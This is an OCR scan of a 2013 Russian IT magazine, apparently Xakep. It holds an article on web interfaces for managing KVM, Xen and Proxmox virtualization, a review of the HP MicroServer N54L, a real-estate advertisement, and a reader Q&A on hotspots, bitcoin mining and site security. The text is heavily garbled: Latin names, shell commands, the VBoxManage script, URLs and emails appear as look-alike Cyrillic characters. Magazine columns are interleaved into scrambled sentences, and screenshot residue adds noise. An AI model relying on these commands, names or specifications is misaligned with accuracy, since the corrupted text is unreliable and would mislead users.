Реализована возможность управления виртуальной средой 
нескольким администраторам с возможностью аудита и кон- 
троля над их действиями. 

Разработку Соп/Ш ведет компания Сопмйиге, при этом ис- 
пользуется концепция ореп соге (открытая основа), когда вме- 
сте с исходными текстами свободно распространяется только 
базовый набор функций, остальное доступно в коммерческой 
версии. В ореп $оигсе варианте отсутствует поддержка Ноп 


АуаНаб!Ку, интеграция с УЁЕАМ, резервирование и восстановле- 
ние, возможность управления из командной строки, уведомле- 
ния и официальная поддержка. 

При разработке использовались фреймворк ТигооСеагз2, 
библиотеки Ех/$ и ЕЕОТ, для хранения информации — МуЗОЕ, 
в качестве ОНСР- и ОМ№$-сервера задействован апзтаза. Нуж- 
ный пакет можно найти в репозиториях популярных дистрибу- 
тивов Мпих. 


КАВЕЗАМ$ЗО! 

Кагезапзи (Кагезапзи-рго]ест. то) — простое в использовании 
веб-приложение для управления системами виртуализации 
К\УМ и Хеп. Учитывая, что поддержка виртуализации базирует- 
ся на Юм, особых трудов добавить Ореп\7, ОЕМУЧУ, МУщиаВох 
не составит. Управление осуществляется при помощи веб- 
браузера, интерфейс реализован в стиле Ме 2.0 с элемента- 
ми А(ах, использование фреймворка |Фиегу позволило придать 
интерфейсу интерактивность, подобную работе за локальной 
консолью в дата-центре. Интерфейс не локализован, но ка- 
ких-либо трудностей в его освоении не возникает. Для досту- 
па к экранам виртуальных машин используется Тю ММС уауа 
\Ле\миег (На \упс.согй). 

Реализованы все возможности для управления виртуальны- 
ми окружениями: установка ОС, создание конфигураций диско- 
вой подсистемы и виртуальных сетевых карт, управление квота- 
ми, репликация, заморозка \М, создание снапшотов, просмотр 
подробной статистики и данных журналов, мониторинг загруз- 
ки. С одной консоли можно управлять несколькими физически- 
ми серверами и размещенными на них виртуальными машина- 
ми. Возможна многопользовательская работа с разделением 
прав. В итоге разработчикам удалось в браузере реализовать 
виртуальное окружение, позволяющее полноценно управлять 
системами. 

Написан Кагезапзи на языке Рупоп, в качестве СУБД 
для одноузловой системы используется ЗОе. Если планиру- 
ется управлять установками Кагезапзш, размещенными на не- 
скольких физических серверах, следует использовать МУЗОЕ 
или Роогеза(. 

Развернуть Кагезапзи! можно в любом Ипих. Сами разработ- 
чики отдают предпочтение Септ0О$ (для которого на сайте есть 
подробная инструкция), хотя Кагезапзи! неплохо себя чувствует 
ина ВеШап и Убит. Перед установкой необходимо выполнить 
все зависимости, указанные в документации. Далее запускает- 
ся установочный скрипт и инициализируется БД. Если исполь- 
зуется многосерверная конфигурация, то нужно просто указать 
внешнюю БД. 

Последующая работа полностью компенсирует неудобства 
установки. Все настройки разделены по семи вкладкам, на- 
значение которых понятно из названия: Сиез, Зейто$, ор, 
Мемогк, Зюгаде, Вером и 109. В зависимости от роли пользо- 
вателя ему будут доступны не все из них. 

Создать новую УМ можно из локального |15О0-файла или ука- 
зав НТТР/ЕТР-ресурс с установочными образами. Также потре- 
буется задать остальные атрибуты: имя системы, которое будет 
отображаться в списке, сетевое имя (По$пате), технологию 
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виртуализации (Хеп или К\УМ), размер ОЗУ и жесткого диска 
(Метогу Эхе и 05К Эхе) — и выбрать картинку, которая будет 
соответствовать виртуальной ОС, упрощая ее быстрый визу- 
альный выбор в консоли. 


МЕВЛАТМСВ 

Возможности описанных решений зачастую избыточны, а их 
установка не всегда понятна администратору с небольшим 
опытом. Но и здесь есть выход. Сервис централизованного 
управления виртуальными машинами \\еб\\\ Мог (меру итог. 
пе!) создавался как простая замена уй-тападег, которая 
обеспечит комфортную работу с УМ при помощи браузера 
с установленным чауа-плагином. Поддерживается управле- 
ние настройками К\УМ: создание, установка, настройка, запуск 
УМ, снапшоты и резервное копирование виртуальных машин. 
Обеспечивается управление сетевым пулом и пулом хранили- 
ща, работа с 1530, клонирование образов, просмотр загрузки 
ЦПУ и ОЗУ. Доступ к виртуальной машине осуществляется че- 
рез УМС. Все операции фиксируются в журналах. При помощи 
одной установки \\Меб\МИМог можно управлять несколькими 
серверами К\/М. Для подключения к ним используется ВРС 
НОмИ (ТСР/16509) или 5$Н. 

Интерфейс написан на РУПоп/О/апдо. Для установки по- 
надобится сервер под управлением Ипих. Распространяется 
(аипиб.сот/ецопаЛмебуи таг) в исходных текстах и ВРМ- 
пакетах для СетО$, АНЕЕ, Еедога и Огасе Мпих 6. Сам процесс 
развертывания несложен и хорошо описан в документации 
проекта (на русском), необходимо лишь настроить БМП и уста- 
новить \\еб\/\Мог. Весь процесс занимает пять минут. После 
подключения к Вазйбоага выбираем Ада Соппесйоп и указыва- 
ем параметры узла, далее можем настраивать \/М. 


РВОХМОХУ\УЕ 

Предыдущие решения хороши для тех ситуаций, когда уже есть 
некоторая инфраструктура. Но если ее предстоит только раз- 
ворачивать, стоит задуматься о специализированных платфор- 
мах, позволяющих быстро получить нужный результат. Приме- 
ром здесь может служить Ргохтох \/Шиа! Епмгоптет (ргохтох. 
сот/ргохтох-ме), представляющий собой дистрибутив Ипих 
(на базе БеШап 7.0 МТеету), который позволяет быстро постро- 
ить инфраструктуру виртуальных серверов с использованием 
Ореп\7й и К\УМ и практически не уступает таким продуктам, 
как /Ммиаге узрпеге, М$ Нурег-\ и Ских Хеп$егуег. 

По сути, систему следует только установить (пара простых 
шагов), все остальное уже работает из коробки. Затем при по- 
мощи веб-интерфейса можно создавать УМ. Для этой цели 
проще всего использовать шаблоны и контейнеры Ореп\/7, ко- 
торые загружаются с внешних ресурсов прямо из интерфейса 
одним щелчком (если вручную, то копируем в каталог /\маг/ИО/ 
\7Летр!ае). Но шаблоны можно создавать в том числе и путем 
клонирования уже созданных систем в режиме связывания. 
Этот вариант позволяет экономить дисковое пространство, так 
как все связанные окружения используют только одну общую 
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СКРИПТУЕМ СОЗДАНИЕ УМ 


Простейший скрипт для создания и запуска виртуальной машины средствами 
\МииаВох: 


#1! /б1п/Ба$в 

утпате="деб1ап01" 

\/ВохМапаге сгеафеут --пате ${утпате} --озфуре "Беб1ап" ‹= 

- -гер1 ег 

\/ВохМапаве тоа1Фуут ${утпате} --тетогу 512 --аср1 оп --Бо0%1 а\а 
\/ВохМапаге сгеафейа --А1епате "${утпате}.\41" --$17е 10000 ‹= 
--уаг1ап{ Е1хед 

\ВохМапаве 5%огавесЕ1 ${утпате} --пате "ТОЕ Сопго11ег" += 

--ааа 1ае --соптго11ег РТТХ4 

\ВохМапаге $з+огавеаасН ${утпате} --огавесе1 "ТОЕ СопЕго11ег" «= 
--рогЕ @ --деум1се @ --+уре Паа --тед1ит "${утпате} .мат" 
\/ВохМапаге $х+огареаасН ${\утпате} --огавесе1 "ТОЕ СопЕго11ег" += 
--рогЕ 09 --де\у1се 1 --Еуре аудаг1уе --тед1ит /1з0/аеб1ап-7.1.0+- 
-1386-пе{1п5{.150 

\ВохМапаве тоа1Фуут ${утпате} --п1с1 Бг1авеа --6г1агеадарег1 <= 
еЕп@ --саб1есоппес*еа1 оп 


\ВохМапаве то@1Фуут ${утпате} --угае оп 


°<сгееп \ВохНеа1е$5 --5Фаг%\ут ${утпаме} 


копию данных эталонного шаблона без дублирования инфор- 
мации. Интерфейс локализован и понятен, особых неудобств 
при работе с ним не испытываешь. 

Имеется поддержка кластеров, инструменты для резервно- 
го копирования виртуальных окружений, возможна миграция 
\\М между узлами без остановки работы. Управление доступом 
к имеющимся объектам (ММ, хранилище, узлы) реализовано 
на основе ролей, поддерживаются различные механизмы ау- 
тентификации (АО, 1РАР, Ипих РАМ, встроенная Ргохтох \Е). 
Веб-интерфейс предоставляет возможность доступа к \М 
при помощи \МС- и 55Н-консолей, можно просматривать ста- 
тус заданий, журналы, данные мониторинга и многое другое. 
Правда, некоторые операции, специфические для НА-систем, 
придется все же выполнять по старинке в консоли, например 
создавать авторизованное 15С$|-подключение, настраивать 
кластер, создавать пира! и некоторые другие операции. 


Системные требования невелики: СРУ хб4 (желательно и 
с те! УТ/АМО-\), 1+ Гб ОЗУ. Проект предлагает готовый 1$О0- Создание новой УМ 
образ и репозиторий для Вешап. в М/еб\и Мог 
ЗАКЛЮЧЕНИЕ хи 
Все описанные решения по-своему хороши и отлично справля- Консоль Ргохтох УЕ 


ются с поставленными задачами. Нужно только выбрать наибо- 
лее подходящее к конкретной ситуации. 2= 


локализована и проста 
виспользовании 


Р р 30х] \ [= 4 токо ты Елигогитини Вы осали как ‘тосбфомт Фызод — Сожаать И4 — Сометь СТ 
Просмотр по серверам * Узея‘ртожютнох <=. Фь > л* 2 
4 3 Де* вы тр юж Сводка ераы Сеть 0; бы 90 №009 ТА наюо У ос ОК 

30, хскто» 
_] 629 уро» м 2076 „ 
Ими % 
25" и 
м 2-е о 
сл 2 к АО Ачит) $4 №3 Ом Соге Реосеих 4000 + (1 Фобне< 
СР. злое # 
) Зе 
РАМ „вас Толя: 99 38 
уже: 52мм 
АР ъьсе Той: 4.0008 
324 9чагго 0 
НО эре 0060 Томе: 34.4108 
рез: $437 
РИ Муки рол руечтагаое 10-20048 < 
Кит утро (рух 26 3-Юрее: ЭФ Мм 5 раяхп 
СРО ивзсе “ 
10 
16 
34 
12 
30 
ов 
ов 
фа 
оз 
ео- + - 
> *^ .. ^ Ё.` = 
Хадуныя "| 
Вое-а ма рев отче» ил ольха ет о Стать 
ль у ть #9 рЕит® 2152" Эт в Ур ис Собалет > 


134 $УМ/АСК ХАКЕР 09 /176/ 2013 


зизииинии: 
иинии: 
инивииииник 
—_—_ 


Евгений Зобнин 
206пп@дтай.сот 


УНИВЕРСАЛ 
В КУБЕ === 


МСВОЗЕРУЕН: МАЛЕНЬКИИ 
СЕРВЕР ДЛЯ БОЛЬШИХ ЗАДАЧ 
Когда речь заходит о домашних файлопомойках или серверах для небольших компаний 
и офисов, на ум приходят либо самосборные башни, либо специализированные устрой- 
ства хранения данных МА$. Однако на рынке есть куда более привлекательное решение 
этого класса. НР М!сгоЗегуег — компактный и многофункциональный сервер с ценником 
начального домашнего компьютера. 
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ВНЕШНИЙ ВИД И ТЕХНОЛОГИЧЕСКАЯ НАЧИНКА сервер будет стоять под столом. Кроме того, логотип, распола- 
МисгоЗегуег №54 — это старшая модель линейки С7, основан- гающийся сразу под отсеком для СО-привода, нужен не только 
ная на двухъядерном процессоре АМРО Типоп 1 Мео М54Е и ос- для красоты: также он служит индикатором состояния серве- 
нащенная 2 Гб оперативной памяти, корзиной на четыре жест- ра — меняет цвет и мерцает в зависимости от возникновения 
ких диска и гигабитным Ейет-портом. Далеко не топовые определенных неполадок. 

характеристики, которых тем не менее с лихвой хватит для об- С задней стороны находятся еще два УЗВ-порта, порт В}-45 
служивания сервера Асйуе Опестогу на десяток-другой клиен- для подключения к сети Епегте, УСА-выход, порт еАТА, стан- 
тов либо организации сетевого хранилища данных. МТУ дартный разъем питания, две заглушки для низкопрофильных 

Сам сервер выполнен в виде невысокой башни необычного карт РС е и большой кулер, который охлаждает всю систему. 
форм-фактора, который в самой НР нарекли Уйга Мсго То\мег. Тестирование про- Отдельных кулеров на процессоре и чипсете в сервере нет, 
По сути, это небольшой черный куб высотой около 250 см и ве- изводительности поэтому общий уровень шума получается очень невысоким, 
сом в б кг без учета жестких дисков, который хорошо впишется сервера с НО)-и 5$0- что, кстати говоря, сама НР преподносит как один из основных 
практически в любое окружающее пространство, будь то место накопителями в разных плюсов сервера. С другой стороны, в домашних условиях ис- 
под столом, на столе или где-то в углу офиса. Заметно, что ди- конфигурациях: пользования М!сго5егуег может оказаться несколько шумным, 
зайн сервера изначально проектировался в расчете на установ- 000.91/В 5 91у но эту проблему можно решить, купив другой вентилятор и за- 
ку на видное место, а не куда-то в шкаф. менив блок питания (см. врезку «Варианты апгрейда»). 

На передней стороне куба располагается отсек для СО- Замеры уровня шума В верхней части задней крышки находится отверстие зам- 
привода, четыре УЗВ-порта и дверца с замком, ведущая к от- сервера в разных ка Кепзто оп, петли для навесного замка, а также болт с пла- 
секу с корзиной на четыре жестких диска. Кнопка включения, конфигурациях: стиковой шляпкой, который очень легко выкрутить пальцами, 
а также индикаторы работы сетевого интерфейса и жестких 000.91/7Ко!ЕВ без необходимости искать отвертку. Болт удерживает верхнюю 
дисков выведены на торцевую панель, что очень удобно, если крышку сервера, которая после его извлечения легко съезжает 


МИКРОСЕРВЕРЫ 
ПОКОЛЕНИЯ СЕМ 


Совсем недавно НР выпустила на рынок но- 
вое поколение Мсго$егуегов — Сеп8. Однако, 
как оказалось, за ярким внешним видом и цен- 
ником, почти в три раза превышающим С7, это 
остался, по сути, все тот же Мсго$егуег первых 
поколений, тремя самыми примечательными 
чертами которого стали двухпортовый сетевой 
интерфейс, совместимость с ЗАТА 3.0 и наличие 
удаленного интерфейса управления НРШО 4. 
Модель С1610Т Сеп8 базируется на про- 
цессоре Иите! Саегоп С1610Т (2,3 ГГц), чипсете 
ще! С204, имеет встроенный ВАЮ-контроллер 
НР Оупатюс Зтай Агау В120! и двухпортовый 
ооооовово встроенный сетевой интерфейс. Более стар- 
|1 №Ф-. и@ф.. шая модель С2020Т основана на процессоре 
к пе! Репнит С2020Т (2,5 ГГц) и в остальном 
ничем не отличается от младшей. Объем опе- 
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м ративной памяти обеих моделей теперь может 
чех . достигать 16 Гб, а объем дисковой — 12 Тб. 


Вместо двух портов РСе в обеих моделях 
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Ай теперь предусмотрен только один низкопро- 
\„Фё’ фильный РС х16б, порт е5АТА также исчез, 
ое а его место заняли два порта ЦЗВ 3.0. Кроме 


того, появилась система удаленного управ- 
ления НР ШО 4, которая должна быть знакома 
любому админу по линейке серверов Ргоцаг\. 

В настоящее время Сеп8 можно приобре- 
сти примерно за 20-22 тысячи рублей, что не- 
соизмеримо дороже С7. 


КОМЬЮНИТИ НР М!СВО$ЗЕВУЕВ 


‚ Хы. сот: НР РгоЦапт{ М'сгоЗегуег: почти готовое 
решение для домашнего сервера (ЬИ.1у/16мМаьо) 

. оуегсосКег$.сот.аи: НР РгоМапЕ МгсгоЗегуег Омт- 
ег Сиб! (Би ЛУЛЯХУО) 


‚  амогит$.сот: НР РгоМапЕ МсгоЗегуег №40Е 


Омтег5 Тйгеад (6И.1у/14,уР8Ю) 


СПИСОК ПРОТЕСТИРОВАННЫХ НАМИ 
ОПЕРАЦИОННЫХ СИСТЕМ 


‚ \ММтадом$ Ноте Зегуег 2011 

‚ Убит 12.10 

. боап$ 11.1 

‚ [еемМА$ 8.3.1 

. Е5Х15.1.0 Урдае 1 (НР Си1от 1таде) 


136 $УМ/АСК 
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Корзина для дисков 


вперед, открывая доступ к отсеку для СО-привода. Самого при- 
вода в комплекте нет, и, если честно, на его место сразу после 
покупки лучше установить корзину для 3,5-дюймового жесткого 
диска, поместить в нее идущий в комплекте диск на 250 Гб и ис- 
пользовать его для установки ОС с флешки; тогда все четыре 
отсека в корзине можно будет отдать под диски с данными, 
сконфигурированными в режиме ВАШ. 

Стоит, однако, иметь в виду, что ЗАТА-порт для СО-привода 
обрезан по скорости, а самого $АТА-кабеля в комплекте 
почему-то нет. Поэтому, чтобы подключить пятый жесткий диск 
или $550-накопитель, придется обзавестись 5,25-дюймовой 
корзиной для диска, ЗАТА-кабелем, переходником для кабеля 
питания Моех — $АТА, а затем еще и перепрошить В!О$ (\м/ллм. 
миНирюаЯ.сот/ВТВВАСЛУМТО) для получения максимальной 
скорости передачи данных. 

Открыв дверцу на передней стороне сервера, мы получаем 
доступ к корзине для жестких дисков. Каждый из них, как и по- 
ложено, размещается в собственном пластиковом картридже, 
к которому прикручивается с помощью четырех болтов. ИХ, 
вместе с Г-образной шестигранной отверткой, можно найти 
с обратной стороны дверцы, что очень удобно и экономит уйму 
времени. Болты для крепления СО-привода располагаются там 
же, так что сервер получается «самообслуживаемый», все опе- 
рации по замене или доустановке комплектующих можно про- 
делать без инструментов. 

Материнская плата, кстати, также крепится на выдвижной 
металлической панели, поэтому, если возникнет необходи- 
мость доустановки, например, модулей памяти, достаточно 
открыть дверцу и вытащить плату наружу, предварительно от- 
ключив мешающие провода. Стоит отметить, на материнке 
разведен дополнительный У$В-разъем типа А, который можно 
использовать для установки загрузочной флешки с геаду-ю-до 
операционной системой типа ЕгееМАЗ. 


ВАРИАНТЫ ИСПОЛЬЗОВАНИЯ 

НР позиционирует М!сгоЗегуег как универсальное сервер- 
ное решение начального уровня. Это и не потенциальный 
веб-сервер, и не ЕТР-сервер, и даже не МАЗ, а нечто сред- 


Системная плата навы- 
движной металличе- 
ской панели 


У\УАВММС 


Регистровая память 
00АЗ ЕСС данным 
сервером не поддержи- 
вается. 


Поддержка АСР! $3 
($еер), ксожалению, 
отсутствует и, по за- 

явлению представителей 
НР, не будет реализована 
в новых версиях 
прошивки. 


Слот РС! Ехргез$ х16 
предназначен для карт 
мощностью не более 
25 ВТ. 


нее, что сам пользователь или администратор сможет на- 
строить на свой вкус и цвет. Два очевидных применения 
М!сгоЗегуег — это сервер Асйуе Опещогу и домашний пото- 
ковый медиасервер, куда можно складировать музыку, филь- 
мы, фотки и бэкапы. 

Обе эти задачи требуют достаточно больших объемов дис- 
кового хранилища, и здесь наличие четырех отсеков для жест- 
ких дисков и встроенный ВРАЮ-контроллер играют решающую 
роль. С другой стороны, встроенный НРАЮ-контроллер (по 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 


Процессор: АМО Типоп И № ео №541 (2,20 ГГц, 15 Вт, 2 Мб) 

Чипсет: АМО А$785Е/$В820М 

Память: 2 слота О0АЗ 

Тип памяти: 003 РСЗ3-10600Е-9 (поп-ЕСС и УприНегед ЕСС) 1 модуль Затзипд РСЗ-10600Е-9 УприНегед ЕСС 2 Гб в 


ВАРИАНТЫ АПГРЕЙДА 


комплекте, возможность расширения до 8 Гб (сообщается об успешном использовании 16 Гб) НР Мсгоегуег — это отличный конструктор с большими 
Порты Зета! АТА: 5 ЗАТА + 1 е5АТА (разъемы тт!-5А$ 1 5ЕЁ-8087 и 1 $АТА) возможностями. Ниже представлены пути расширения 
Жесткие диски: Четыре отсека для 3,5" ЗАТА-дисков функциональности и повышения производительности. 
Максимальный объем: 8 Тб (4 х 2 Тб) (сообщается об успешном использовании дисков объемом 3 Тб) 

Возможность горячей замены: нет, В комплекте 1 диск на 250 Гб Сетевые адаптеры 

Поддержка ВАО: Интегрированный ЗАТА-контроллер с поддержкой ВАШ 0, 1, 10, /В00 . ме ЕХР!ЭЗО1СТВЕК Мемогк Адарег 10/100/1000 
Сетевой интерфейс: Встроенный гигабитный адаптер НР №С107! (чип Втоадсот ВСМ5723КМЕСб) Мбит/с РС!-Ехрге$$ 

Поддержка уитБо {татез: нет .‚ НР МСЗ6ОТ Она! Ром 10/100/1000 Мбит/с РС!-Ехрге$$ 
Питание: Блок питания мощностью 150 Вт 

Расширение: 1 низкопрофильный слот РС! х16 \2.0, 1 низкопрофильный слот РСЁе х4 (для 1РМП, 1 низкопрофильный слот РС х1 ВА!О-контроллеры 

Внешние порты ввода-вывода: 1 \/СА-выход, 7 УЗВ 2.0 портов (4 спереди, 2 сзади, 1 внутри), 1 порт В/-45  НРРА1О тай Атау Сотгойег 

Видео: Интегрированный видеочип Вадеоп НО4200, Максимальное разрешение: 1920 х 1200 ° НОПРом{ РВоскевАШ 2720561 


Исполнение: Цйга Мгсго Томег, 26,7 х 21,0 х 26,0 см 

Охлаждение: 1 вентилятор на задней стенке 

Соответствие стандартам: АСР! \2.0, РС! 2.3, РХЕ, МОЕ, РМ! 2.0, ЦЗВ 2.0, 9ЗВ 3.0, ЗАТА Сеп 2 
Поддержка ОС: М!сго5оН \\Мпдо\м$ Зегуег, Вед На Ещегризе Мпих (ВНЕ) 


Модули памяти 
. Ктпозюоп К\УА133303Е9 $/4&@ 
. НР500672-В21 4 Гб 


Жесткие диски 
. \Мечет Оюка! 2 Тб МО Веа (\М/О20ЕРАХ) {ЗАТА 11, 
5400 об/мин 64 Мб, 3,5"} 


$$0 (для системы, для слайсов Е2АВС и 21/510С 

в случае использования файловой системы 2Е$) 

. 06 $50 60 Гб 520 серия (3$0$С2С\МОбОАЗК5) 
{ЗАТА Ш, МЕС, 2,5"} 


Плата для удаленного управления 
. НР 615095-В21 Мсго Зегуег Ветоге Ассе$$ Сага КИ 


Поддержка 9$В 3.0 

. РС Г Ехрге$$ фо Зирег5рееа ЦЗВ 3.0 2-Роч Ехрапзюп 
Сага юг ВезКор$ (чипсет Вепезаз$ иРО720202 хн( 
1.0) 


Более шустрая видеокарта с НОМ!-выходом (для 

превращения №541 в медиапроигрыватель) 

. АП Вадеоп НО 5450 512 Мб ООАЗ Заррйи!е (11166-06- 
10А, РС|-Е, ОМ, НОМУ, УСА) 


Тихий блок питания 
Конфигурация пулов 2Е$ ‚ Оеазопс $5$5-250$0 


Практически бесшумный вентилятор 
большому счету это Еаке РАО) не отличается особой функци- .  оСУПе «Ир Згеат» 120 мм РММ Адизаые 
ональностью (например, поддержки РАГШО 5 вообще нет) и про- 
изводительностью, поэтому, как уже было сказано выше, са- 
мым правильным решением будет установить операционную 
систему на пятый жесткий диск и уже с ее помощью собрать 


программный ВАШ. А если еще и использовать в качестве 


ОС Цпих с файловой системой В, то можно получить и вовсе ПМЕО Еще одно интересное применение МгсгоЗегуег — это созда- 
прекрасную замену МА$ с возможностью создавать ВАГО 5 (или ние платформы виртуализации на базе ЕЗХ! или Хеп. Железная 
З-мау плитог для хранения особо ценной информации), делать В комплекте идут сразу начинка сервера вполне потянет с десяток не особо загружен- 
снапшоты, автоматически восстанавливать данные при их по- два кабеля питания: ных виртуальных окружений, а объем дискового пространства 
вреждении. один под розетку Е/Ё, позволит построить целую экспериментальную лабораторию. 
В случае использования М'сгоЗегуег в качестве потокового второй — под разъем @, Производительности сервера также хватит и для вывеши- 
сервера мультимедиа, когда хранимые на нем данные будут с отдельным предохра- вания корпоративного веб-сайта и многих других задач. Так 
отдаваться на другую машину в режиме реального времени, нителем в вилке. что универсальность — это действительно главное достоинство 
никаких проблем не возникнет. С этой задачей он справится Мисго5егуег. 
легко. Однако если планируется приспособить его в качестве 
медиацентра с подключением самого сервера к монитору или ВЫВОДЫ 
телевизору, то здесь следует иметь в виду два нюанса. Во- В общем и целом НР МсгоЗегуег №541 С7 производит очень 
первых, в качестве видеовыхода предусмотрен только УСА, так хорошее впечатление. При ценнике в 8500 рублей это едва ли 
что с подключением к большинству телевизоров будут пробле- не лучшее серверное решение подобного класса на рынке. Да, 
мы, во-вторых, аудиовыхода нет вовсе. Поэтому стоит заранее можно было бы придраться к далеко не рекордным скоростям 
позаботиться о покупке простой видеокарты с НОМ!-выходом работы с накопителями, к пластиковым салазкам, которые 
и аппаратным декодером видео. Именно простой и дешевой, того и гляди сломаются, к не самому мощному блоку питания, 
так как максимальное энергопотребление платы, подключен- который явно не рассчитан на подключение жадных до энер- 
ной к порту Ре х1б6, должно составлять 25 Вт (список проте- гии РАе-карт, однако МсгоЗегуег дешев, прост в эксплуата- 
стированных карт можно посмотреть здесь: ции, удобен в обслуживании и отличается высоким качеством 


сборки. 2= 


141006, Московская область, 
А М С т О п И т г Мытищи, Олимпийский проспект, д. 48 
грРЧААа компани й Тел.: (495) 660 96 З1, (495) 662 74 50, 
факс: (495) 660 96 41 


ЖИЛОЙ КОМПЛЕКС 


«МЕЩЕРИХИНСКИЕ 
ДВОРИКИ», Г. ЛОБНЯ 


Группа компаний «Монолит» приглашает к зна- 
комству с новыми жилыми домами в комплек- 
се «Мещерихинские дворики» на улице Моло- 
дежной уютного подмосковного города Лобня. 


До места встречи можно добраться от м. Алтуфьев- 
ская автобусом №459 или с Савеловского вокзала на 
пригородной электричке до ст. Лобня далее 7-10 мин. 
автобусом №1. Ближайшие транспортные магистра- 
ли — Дмитровское, Ленинградское шоссе. 


В жилом комплексе «Мещерихинские дворики» 

вас ждут два прекрасных 17-этажных двухподъезд- 

мы "ных дома под номерами 14а и 14Б. Это - надежные 

Е Е — {| монолитно-кирпичные здания, оснащенные всем 

ны = | --— необходимым для жизни, в том числе грузовым 
и пассажирским лифтами. 


Здесь вы сможете выбрать для себя светлые и про- 
сторные квартиры современной планировки - одно, 
двух и трехкомнатные. В квартирах предусмотрены 
пластиковые стеклопакеты, радиаторы с терморегуля- 
торами, электроразводка, застекленные лоджии и т.д. 


Для любителей прогулок организована зона отдых, 
украшенная декоративными кустарниками и деревья- 
ми, благоустроенная игровая площадка для детей, 
а для автомобилистов -— стоянка. Молодых родителей - 
порадует новый детский сад в шаговой доступности. м 


Группа компаний «Монолит» надеется, что после пер- 
вой же встречи с новой квартирой, у Вас возникнет с 
ней взаимная симпатия и долгие надежные отношения. 


Условия приобретения квартир: рассрочка пла- 

тежа, ипотека, взаимозачет Вашей старой квартиры 

на Вашу новую. Возможны скидки при условии 100% 
оплаты и использовании ипотечного кредита. 


л\\ ПО ВОПРОСАМ ПРИОБРЕТЕНИЯ КВАРТИР (495) 739-93-93 


(«МОНОЛИТ НЕДВИЖИМОСТЬ) 
МОСКВА, ПРОЕЗД СЕРЕБРЯКОВА, Д. 14, СТР. 9 


ГРУППА КОМПАНИЙ «МОНОЛИТ» - ОДНО ИЗ КРУПНЕЙШИХ ПРЕДПРИЯТИЙ-ЛИДЕРОВ 
МОСКОВСКОЙ ОБЛАСТИ, ДЕЙСТВУЮЩИХ НА СТРОИТЕЛЬНОМ РЫНКЕ С 1989 ГОДА. 
ОСНОВНЫМ НАПРАВЛЕНИЕМ ДЕЯТЕЛЬНОСТИ ГРУППЫ КОМПАНИЙ «МОНОЛИТ» ЯВЛЯЕТСЯ 
ВОЗВЕДЕНИЕ ЖИЛЫХ ЗДАНИЙ И ОБЪЕКТОВ СОЦИАЛЬНОГО НАЗНАЧЕНИЯ ПО ИНДИВИ- 
ДУАЛЬНЫМ ПРОЕКТАМ. В ОСНОВЕ ЛЕЖИТ ТЕХНОЛОГИЯ МОНОЛИТНОГО ДОМОСТРОЕНИЯ 
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С подробными схемами планировок квартир 

и проектной декларацией можно ознакомиться 
на сайте м/мим!.дК-топоШ.ги или в офисе 
компании «Монолит недвижимость» 
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Реклама 


Группа «Монолит» активно работает с ведущими 


Город Лобня расположен в лесопарковой зоне 
банками по программам ипотечного кредито- 


Подмосковья, в ближайшем окружении имеются 
вания. Особое внимание уделяется правовой живописные озера и пруды. Недалеко от Лобни — 
защищенности клиентов, приобретателей ансамбль бывшей усадьбы Марфино, несколько 
жилья и нежилых помещений. 


центров русских народных промылов. Культурная 
жизнь города сосредоточена в основном в Куль- 
турно-досуговом центре «Чайка» и парке Культуры 
и Отдыха, есть театры и музеи, художественная 
галлерея. Для любителей спорта - два бассейна 
ледовый каток, Дворец спорта «Лобня». 


— ‘ | Г М 5% 

и ит ГМ 
1 Е ГР 
Е -— и 
ИТ ит ик п == 
«т чили: — Ш тАИии 

‚ИТ ЧИН Пт И ИГ 

И ЧИ: рт ЩИ ит 


= 
В И 


НЕ Е 


ЕЕ г — 


ПО ВОПРОСАМ АРЕНДЫ ПОМЕЩЕНИЙ 
Л 


(ООО «МОНОЛИТ АРЕНДА)) (935) 727-57-62 
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ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НАЕАО@ВЕАЕ.ХАКЕРВИУ 


Хочу расшарить инет с ноутбука под 

управлением УБити. Создаю точку до- 
ступа через Мемогк Мападег, но ни Апаго!а- 
смартфон, ни планшет кней не могут подклю- 
читься. В чем дело? 

Дело втом, что Ме`\могк Мападег создает так 

называемую аа Пос сеть (БИ.1у/аЯПос-мик, 
с которой не умеет работать Апаго (да и 05, 
кстати, тоже). Нам нужна инфраструктура По{$рот. 
На ХОА есть детальное описание (Би./у/по$рот- 
ибийти) того, как такую инфраструктуру можно 
поднять, не удаляя МемогК Мападег. На базе этого 
туториала написана утилита, которая в автомати- 
ческом режиме поднимает По{5ро{т точку досту- 
па, — ар-По{ро\т. Установить ее можно так: 


$ зидо ааа-ар*-геро$1огу «= 
рра:п11аг1тогага/меБира8 

$ зидо арЕ-веф ирда*е 

$ зи4ао ар*-веф 1п5%а11 ар-Но®5ро* 


Теперь для поднятия точки доступа достаточ- 
НО ВЫПОЛНИТЬ: 


$ зи4ао ар-ПоЕ5роф $%агЕ 


Кроме $Зац, также доступны команды 3р, 
геа" и сопНадиге. Стоит отметить, что не все 
сетевые карты поддерживают режим Позроф, — 
утилита известит тебя в таком случае. 


Как правильно посчитать, сколько вре- 

мени уйдет, чтобы намайнить один 
6исот? 

Можно воспользоваться специальным 

о{цсот-калькулятором, который доступен 


по адресу Бисоскег$.сот/сас. Количество 


Мва$п/з$ для твоей видеокарты/процессора/ 
Висот-процессора можно узнать на мк:- 
странице (Би.1у/оИсотпага). Что интересно, 
калькулятор способен вычислить и стоимость 
потраченного на майнинг электричества. 


[2] Нужно обеспечить высокую безопас- 

ность сайта. Что посоветуешь? 

А Думаю, о таких очевидных вещах, как за- 

щита от 5ОЁ-инъекций, тщательная филь- 
трация входных данных, защита от ХЗНР и так да- 
лее, читателю |[ говорить не нужно. Дам 
несколько менее тривиальных советов: 

. Используй ЗЕ везде, где это возможно: ни- 
какого НТТР — только НТТР$. Настроить ЭЗЁ 
не очень сложная задача, но настроить его 
правильно и безопасно — задача похитрее. 


эигпилагу 


Омега ВаНио 


сагмиИсй а 


Кау Екенагое 


Сорные ВИее Сео, 
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У 


Роман Гоций 
0015$тотап@дтан.сот 


Сервис Очцам$ ЗЗЁ зегуег {ез{ (\м/млм.55Парз. 
сот/5$[ез{) поможет тебе проверить каче- 
ство Эна своем сервере (смотри скриншот) 
и укажет на ошибки. Также полезно исполь- 
зовать НЗТ$ (НТТР Уис+{ Тгапзрой Зесийщу) — 
механизм, сообщающий браузеру исполь- 
зовать для взаимодействия с сайтом только 
НТТР$. Подробнее об этом читай здесь: Чем. 
спгогппиил.ога/${$. 

. Для предотвращения Х$$, кроме стандартных 
техник, используй также Сощет{ зесишу ройсу 
